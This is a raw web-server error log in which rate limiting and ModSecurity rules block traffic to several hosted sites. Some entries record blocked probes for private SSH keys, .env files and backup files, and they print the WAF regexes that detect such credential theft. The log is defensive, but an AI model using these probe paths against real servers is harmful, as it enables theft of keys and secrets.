[Tue May 26 19:55:13.777425 2026] [qos:error] [pid 93576:tid 93790] [client 45.148.10.120:49132] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSWDRMqfxdEDkoszY0QAAAE4
[Tue May 26 19:55:13.778484 2026] [qos:error] [pid 93868:tid 94300] [client 45.148.10.120:49044] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSUqK9k_ZUB2Vp25RygAAAbk
[Tue May 26 19:55:13.779708 2026] [qos:error] [pid 93868:tid 94259] [client 45.148.10.120:49050] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSUqK9k_ZUB2Vp25RywAAAZA
[Tue May 26 19:55:13.780979 2026] [qos:error] [pid 93868:tid 94272] [client 45.148.10.120:49092] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSUqK9k_ZUB2Vp25RzAAAAZ0
[Tue May 26 19:55:13.782038 2026] [qos:error] [pid 93868:tid 94362] [client 45.148.10.120:49068] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSUqK9k_ZUB2Vp25RzQAAAfc
[Tue May 26 19:55:13.782332 2026] [qos:error] [pid 93576:tid 93830] [client 45.148.10.120:43422] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSWDRMqfxdEDkoszY0gAAAHY
[Tue May 26 19:55:13.786332 2026] [qos:error] [pid 93868:tid 94288] [client 45.148.10.120:60112] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSUqK9k_ZUB2Vp25RzgAAAa0
[Tue May 26 19:55:13.787330 2026] [qos:error] [pid 93868:tid 94321] [client 45.148.10.120:49118] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSUqK9k_ZUB2Vp25RzwAAAc4
[Tue May 26 19:55:13.790121 2026] [qos:error] [pid 93868:tid 94333] [client 45.148.10.120:49014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSUqK9k_ZUB2Vp25R0AAAAdo
[Tue May 26 19:55:13.796648 2026] [qos:error] [pid 93868:tid 94358] [client 45.148.10.120:49164] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSUqK9k_ZUB2Vp25R0QAAAfM
[Tue May 26 19:55:13.854966 2026] [security2:error] [pid 93576:tid 93724] [client 185.177.72.53:42764] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/smtp.ini.bak"] [unique_id "ahWtSWDRMqfxdEDkoszY1wAAAAw"]
[Tue May 26 19:55:13.892127 2026] [security2:error] [pid 93576:tid 93821] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWtSWDRMqfxdEDkoszY1AAAAG0"], referer: https://www.anujtradingco.com/
[Tue May 26 19:55:13.924704 2026] [qos:error] [pid 93576:tid 93827] [client 45.148.10.120:49132] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSWDRMqfxdEDkoszY2wAAAHM
[Tue May 26 19:55:13.927698 2026] [qos:error] [pid 93868:tid 94371] [client 45.148.10.120:49050] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSUqK9k_ZUB2Vp25R1QAAAgA
[Tue May 26 19:55:13.928923 2026] [qos:error] [pid 93868:tid 94379] [client 45.148.10.120:49044] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSUqK9k_ZUB2Vp25R1gAAAgg
[Tue May 26 19:55:13.929359 2026] [qos:error] [pid 93576:tid 93767] [client 45.148.10.120:43422] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSWDRMqfxdEDkoszY3AAAADc
[Tue May 26 19:55:13.930337 2026] [qos:error] [pid 93868:tid 94323] [client 45.148.10.120:49092] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSUqK9k_ZUB2Vp25R1wAAAdA
[Tue May 26 19:55:13.934079 2026] [qos:error] [pid 93868:tid 94301] [client 45.148.10.120:49068] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSUqK9k_ZUB2Vp25R2AAAAbo
[Tue May 26 19:55:13.936916 2026] [qos:error] [pid 93868:tid 94332] [client 45.148.10.120:49118] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSUqK9k_ZUB2Vp25R2QAAAdk
[Tue May 26 19:55:13.937780 2026] [qos:error] [pid 93868:tid 94305] [client 45.148.10.120:60112] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSUqK9k_ZUB2Vp25R2gAAAb4
[Tue May 26 19:55:13.941573 2026] [qos:error] [pid 93868:tid 94273] [client 45.148.10.120:49014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSUqK9k_ZUB2Vp25R2wAAAZ4
[Tue May 26 19:55:13.952357 2026] [qos:error] [pid 93868:tid 94346] [client 45.148.10.120:49164] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSUqK9k_ZUB2Vp25R3AAAAec
[Tue May 26 19:55:14.072862 2026] [qos:error] [pid 93576:tid 93789] [client 45.148.10.120:49132] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSmDRMqfxdEDkoszY3wAAAE0
[Tue May 26 19:55:14.075171 2026] [qos:error] [pid 93868:tid 94342] [client 45.148.10.120:49050] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSkqK9k_ZUB2Vp25R4AAAAeM
[Tue May 26 19:55:14.077998 2026] [qos:error] [pid 93868:tid 94300] [client 45.148.10.120:49044] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSkqK9k_ZUB2Vp25R4QAAAbk
[Tue May 26 19:55:14.078760 2026] [qos:error] [pid 93576:tid 93771] [client 45.148.10.120:43422] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSmDRMqfxdEDkoszY4AAAADs
[Tue May 26 19:55:14.080177 2026] [qos:error] [pid 93868:tid 94259] [client 45.148.10.120:49092] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSkqK9k_ZUB2Vp25R4gAAAZA
[Tue May 26 19:55:14.085903 2026] [qos:error] [pid 93868:tid 94272] [client 45.148.10.120:49068] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSkqK9k_ZUB2Vp25R4wAAAZ0
[Tue May 26 19:55:14.088319 2026] [qos:error] [pid 93868:tid 94362] [client 45.148.10.120:49118] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSkqK9k_ZUB2Vp25R5AAAAfc
[Tue May 26 19:55:14.090849 2026] [qos:error] [pid 93868:tid 94288] [client 45.148.10.120:60112] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSkqK9k_ZUB2Vp25R5QAAAa0
[Tue May 26 19:55:14.098081 2026] [qos:error] [pid 93868:tid 94333] [client 45.148.10.120:49014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSkqK9k_ZUB2Vp25R5gAAAdo
[Tue May 26 19:55:14.106216 2026] [qos:error] [pid 93868:tid 94358] [client 45.148.10.120:49164] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSkqK9k_ZUB2Vp25R5wAAAfM
[Tue May 26 19:55:14.188403 2026] [security2:error] [pid 93868:tid 94302] [client 54.39.6.145:60024] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "eco-green.com.mx"] [uri "/"] [unique_id "ahWtSkqK9k_ZUB2Vp25R6AAAAbs"]
[Tue May 26 19:55:14.188536 2026] [security2:error] [pid 93868:tid 94302] [client 54.39.6.145:60024] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "eco-green.com.mx"] [uri "/"] [unique_id "ahWtSkqK9k_ZUB2Vp25R6AAAAbs"]
[Tue May 26 19:55:14.223286 2026] [qos:error] [pid 93868:tid 94337] [client 45.148.10.120:49050] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSkqK9k_ZUB2Vp25R6QAAAd4
[Tue May 26 19:55:14.224610 2026] [qos:error] [pid 93576:tid 93736] [client 45.148.10.120:49132] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSmDRMqfxdEDkoszY4gAAABg
[Tue May 26 19:55:14.227098 2026] [qos:error] [pid 93868:tid 94274] [client 45.148.10.120:49044] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSkqK9k_ZUB2Vp25R6gAAAZ8
[Tue May 26 19:55:14.227101 2026] [qos:error] [pid 93576:tid 93753] [client 45.148.10.120:43422] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtSmDRMqfxdEDkoszY4wAAACk
[Tue May 26 19:55:14.237820 2026] [qos:error] [pid 93868:tid 94379] [client 45.148.10.120:49092] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSkqK9k_ZUB2Vp25R6wAAAgg
[Tue May 26 19:55:14.238181 2026] [qos:error] [pid 93868:tid 94261] [client 45.148.10.120:49068] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSkqK9k_ZUB2Vp25R7QAAAZI
[Tue May 26 19:55:14.238509 2026] [qos:error] [pid 93868:tid 94323] [client 45.148.10.120:49118] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSkqK9k_ZUB2Vp25R7AAAAdA
[Tue May 26 19:55:14.244591 2026] [qos:error] [pid 93868:tid 94301] [client 45.148.10.120:60112] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSkqK9k_ZUB2Vp25R7gAAAbo
[Tue May 26 19:55:14.256893 2026] [qos:error] [pid 93868:tid 94332] [client 45.148.10.120:49014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSkqK9k_ZUB2Vp25R8AAAAdk
[Tue May 26 19:55:14.260535 2026] [qos:error] [pid 93868:tid 94273] [client 45.148.10.120:49164] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSkqK9k_ZUB2Vp25R8gAAAZ4
[Tue May 26 19:55:14.275255 2026] [security2:error] [pid 93868:tid 94338] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSEqK9k_ZUB2Vp25RPwAAAd8"]
[Tue May 26 19:55:14.276487 2026] [security2:error] [pid 93576:tid 93747] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSGDRMqfxdEDkoszYXgAAACM"]
[Tue May 26 19:55:14.289742 2026] [security2:error] [pid 93868:tid 94308] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSEqK9k_ZUB2Vp25ROwAAAcE"]
[Tue May 26 19:55:14.290804 2026] [security2:error] [pid 93868:tid 94322] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSEqK9k_ZUB2Vp25RTwAAAc8"]
[Tue May 26 19:55:14.291781 2026] [security2:error] [pid 93576:tid 93717] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSGDRMqfxdEDkoszYVAAAAAU"]
[Tue May 26 19:55:14.299694 2026] [security2:error] [pid 93576:tid 93798] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSGDRMqfxdEDkoszYaAAAAFY"]
[Tue May 26 19:55:14.306128 2026] [security2:error] [pid 93868:tid 94266] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSEqK9k_ZUB2Vp25RQAAAAZc"]
[Tue May 26 19:55:14.318030 2026] [security2:error] [pid 93576:tid 93806] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSGDRMqfxdEDkoszYWAAAAF4"]
[Tue May 26 19:55:14.320675 2026] [security2:error] [pid 93868:tid 94326] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSEqK9k_ZUB2Vp25RVgAAAdM"]
[Tue May 26 19:55:14.333191 2026] [security2:error] [pid 93868:tid 94286] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSEqK9k_ZUB2Vp25RPgAAAas"]
[Tue May 26 19:55:14.341244 2026] [security2:error] [pid 93868:tid 94280] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSEqK9k_ZUB2Vp25RXQAAAaU"]
[Tue May 26 19:55:14.341437 2026] [security2:error] [pid 93868:tid 94349] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSEqK9k_ZUB2Vp25RVQAAAeo"]
[Tue May 26 19:55:14.357545 2026] [security2:error] [pid 93868:tid 94264] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSEqK9k_ZUB2Vp25RXwAAAZU"]
[Tue May 26 19:55:14.358716 2026] [security2:error] [pid 93868:tid 94369] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSEqK9k_ZUB2Vp25RSQAAAf4"]
[Tue May 26 19:55:14.363299 2026] [security2:error] [pid 93576:tid 93762] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSGDRMqfxdEDkoszYbAAAADI"]
[Tue May 26 19:55:14.365763 2026] [security2:error] [pid 93576:tid 93811] [client 185.177.72.53:42764] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/api/v1/root/.ssh/id_rsa"] [unique_id "ahWtSmDRMqfxdEDkoszY5wAAAGM"]
[Tue May 26 19:55:14.365888 2026] [security2:error] [pid 93576:tid 93728] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSWDRMqfxdEDkoszYuAAAABA"]
[Tue May 26 19:55:14.372474 2026] [security2:error] [pid 93576:tid 93818] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSWDRMqfxdEDkoszYngAAAGo"]
[Tue May 26 19:55:14.374978 2026] [security2:error] [pid 93576:tid 93823] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSGDRMqfxdEDkoszYXwAAAG8"]
[Tue May 26 19:55:14.384851 2026] [security2:error] [pid 93868:tid 94315] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSEqK9k_ZUB2Vp25RUAAAAcg"]
[Tue May 26 19:55:14.384883 2026] [security2:error] [pid 93868:tid 94344] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSUqK9k_ZUB2Vp25RngAAAeU"]
[Tue May 26 19:55:14.390080 2026] [security2:error] [pid 93576:tid 93816] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSWDRMqfxdEDkoszYvQAAAGg"]
[Tue May 26 19:55:14.396049 2026] [security2:error] [pid 93868:tid 94307] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSUqK9k_ZUB2Vp25RigAAAcA"]
[Tue May 26 19:55:14.405386 2026] [security2:error] [pid 93576:tid 93743] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSWDRMqfxdEDkoszYtAAAAB8"]
[Tue May 26 19:55:14.406691 2026] [security2:error] [pid 93868:tid 94378] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSEqK9k_ZUB2Vp25RRwAAAgc"]
[Tue May 26 19:55:14.408304 2026] [security2:error] [pid 93868:tid 94366] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSUqK9k_ZUB2Vp25RkQAAAfs"]
[Tue May 26 19:55:14.408645 2026] [security2:error] [pid 93576:tid 93715] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSWDRMqfxdEDkoszYswAAAAM"]
[Tue May 26 19:55:14.417929 2026] [security2:error] [pid 93868:tid 94279] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSEqK9k_ZUB2Vp25RYAAAAaQ"]
[Tue May 26 19:55:14.419247 2026] [security2:error] [pid 93868:tid 94318] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSEqK9k_ZUB2Vp25RXgAAAcs"]
[Tue May 26 19:55:14.433386 2026] [security2:error] [pid 93868:tid 94377] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSEqK9k_ZUB2Vp25RZwAAAgY"]
[Tue May 26 19:55:14.443435 2026] [security2:error] [pid 93868:tid 94376] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSUqK9k_ZUB2Vp25RnwAAAgU"]
[Tue May 26 19:55:14.457340 2026] [security2:error] [pid 93868:tid 94327] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSEqK9k_ZUB2Vp25RWgAAAdQ"]
[Tue May 26 19:55:14.462144 2026] [security2:error] [pid 93576:tid 93737] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSWDRMqfxdEDkoszYvgAAABk"]
[Tue May 26 19:55:14.532556 2026] [security2:error] [pid 93576:tid 93748] [client 185.177.72.53:42764] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/processor/.env"] [unique_id "ahWtSmDRMqfxdEDkoszZBAAAACQ"]
[Tue May 26 19:55:14.558750 2026] [qos:error] [pid 93868:tid 94327] [client 45.148.10.120:56886] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSkqK9k_ZUB2Vp25SOQAAAdQ
[Tue May 26 19:55:14.559094 2026] [qos:error] [pid 93576:tid 93804] [client 45.148.10.120:43372] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSmDRMqfxdEDkoszZCwAAAFw
[Tue May 26 19:55:14.560337 2026] [qos:error] [pid 93868:tid 94377] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtSkqK9k_ZUB2Vp25SOgAAAgY
[Tue May 26 19:55:14.560924 2026] [qos:error] [pid 93576:tid 93778] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtSmDRMqfxdEDkoszZDAAAAEI
[Tue May 26 19:55:14.568434 2026] [qos:error] [pid 93868:tid 94263] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtSkqK9k_ZUB2Vp25SPQAAAZQ
[Tue May 26 19:55:14.577014 2026] [qos:error] [pid 93868:tid 94291] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtSkqK9k_ZUB2Vp25SPgAAAbA
[Tue May 26 19:55:14.614225 2026] [qos:error] [pid 93868:tid 94323] [client 45.148.10.120:60050] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSkqK9k_ZUB2Vp25SRAAAAdA
[Tue May 26 19:55:14.672762 2026] [security2:error] [pid 93868:tid 94327] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWtSkqK9k_ZUB2Vp25SQgAAAdQ"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1460628&moderation-hash=8e6d757da7318ad697c4f61b282022af
